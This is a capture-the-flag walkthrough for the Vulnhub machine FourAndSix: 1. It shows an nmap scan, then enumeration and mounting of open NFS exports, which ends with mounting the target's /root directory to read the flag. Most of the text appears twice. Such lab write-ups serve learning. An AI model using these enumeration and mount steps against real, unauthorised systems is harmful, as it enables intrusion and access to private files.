FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup
FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup: http://gestyy.com/w7LVu2
Today we will be looking at FourAndSix: 1 CTF Vulnhub Challenge by Fred which was uploaded on Vulnhub.com. It is a entry level, beginner friendly CTF suitable for noobs.
As no description is provided by the author on vulnhub we assume we need to gain root access and capture the flag as most of the case.
You can download this machine by clicking here.
Lets Get Started:
nmap -sV -sC -A 192.168.43.136 -vv -p-
Well we can clearly see that the port 2049 is running NFS(Network File System) service and must have an export available to mount :D
Network File System(NFS) allows remote hosts to mount file system over a network. For this NFS server export a directory which can be mounted remotely.
Lets check for the available mounts:
So we got our export available and it is shared with everyone in the /shared directory on the server.
Its time to mount it. So create a directory first for the export to mount and mount it on your system.
we found a image(.img) file in /shared directory of out export. Lets try to mount it and see if we find something interesting.
but got no luck.
We need to access root directory in order to get the root flag so lets try to mount the root directory if we can.
And in the root directory mount we have a file names proof.txt
Let us check the content of the text file proof.txt
cat proof.txt
And Voila!! we have our root flag!
Today we will be looking at FourAndSix: 1 CTF Vulnhub Challenge by Fred which was uploaded on Vulnhub.com. It is a entry level, beginner friendly CTF suitable for noobs.
As no description is provided by the author on vulnhub we assume we need to gain root access and capture the flag as most of the case.
You can download this machine by clicking here.
Lets Get Started:
FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup
After getting the IP address of the machine we hit nmap for the available ports and service.nmap -sV -sC -A 192.168.43.136 -vv -p-
Nmap scan report for fourandsix (192.168.43.136) Host is up, received arp-response (0.00081s latency). Scanned at 2018-07-23 19:38:36 IST for 681s Not shown: 65531 closed ports Reason: 65531 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 1c:8a:0e:a7:ae:6a:72:ab:c8:88:db:0b:fc:7d:53:c0 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxwYsIPtgzrJCCBfDxQaA4eMOcJGfP7ioV4nTzwMGKyCryOrCcsBIk9X++SMbXb2Sxlq+XYhBa9nMT2abfOUAuh3LcW+DB+ndMqSEgI/w2wqCR3vL8wT6+Pig+lflh4aIWDXULRKBjNAf9c1rdJ1tt4SYEsEDJ807HVb5Rg2hulibVgp095/EpTyB2vG6ig9zo4rqt0sPF6oc+yaIxld9GrnUxueAkPqw/qwIGO0TIzkuUnZOCmaRT0BnPv6meQQIvy2GiQM8gU+Fk9AceD6YE9iC08wB3nbo8E8A1DHvOCbhBhW/RW5kQ8VFJxdWxTXquKe74S7sfDeZ/lNGyATI7 | 256 8a:9e:af:85:ef:41:51:54:ee:14:35:9d:78:46:cd:56 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKuhzpuMVn0mCPSETswV/gJYan5nphdhOcpOwOBNkIPb2p7h6reh9a5k2h9KyG5XeAqNW5V3wFTJmEfZCzOAvPM= | 256 0f:42:83:da:a5:7e:53:9c:a5:21:e4:3f:8a:d8:ad:28 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG6mHUNP/Xzjw55bhOsx0amSUeEgZifBUpf8y/G4QWR0 111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3 2049/tcp nfs | 100003 2,3 2049/udp nfs | 100005 1,3 787/tcp mountd |_ 100005 1,3 858/udp mountd 787/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005) 2049/tcp open nfs syn-ack ttl 64 2-3 (RPC #100003) MAC Address: 08:00:27:09:69:05 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: OpenBSD 6.X OS CPE: cpe:/o:openbsd:openbsd:6 OS details: OpenBSD 6.0 - 6.1
Well we can clearly see that the port 2049 is running NFS(Network File System) service and must have an export available to mount :D
Network File System(NFS) allows remote hosts to mount file system over a network. For this NFS server export a directory which can be mounted remotely.
Lets check for the available mounts:
showmount -e 192.168.43.136 Export list for 192.168.43.136: /shared (everyone)
So we got our export available and it is shared with everyone in the /shared directory on the server.
Its time to mount it. So create a directory first for the export to mount and mount it on your system.
mkdir /tmp/CTF mount -t nfs 192.168.43.136:/shared /tmp/CTF
we found a image(.img) file in /shared directory of out export. Lets try to mount it and see if we find something interesting.
mkdir usb_stick mount USB-stick.img usb_stick/ cd usb_stick/ ls -la
but got no luck.
We need to access root directory in order to get the root flag so lets try to mount the root directory if we can.
mkdir root mount -t nfs 192.168.43.136:/root /tmp/CTF/root/ cd /tmp/CTF/root ls -la
And in the root directory mount we have a file names proof.txt
Let us check the content of the text file proof.txt
cat proof.txt
And Voila!! we have our root flag!
Thanks a lot. This blog was really helpful for me
ReplyDelete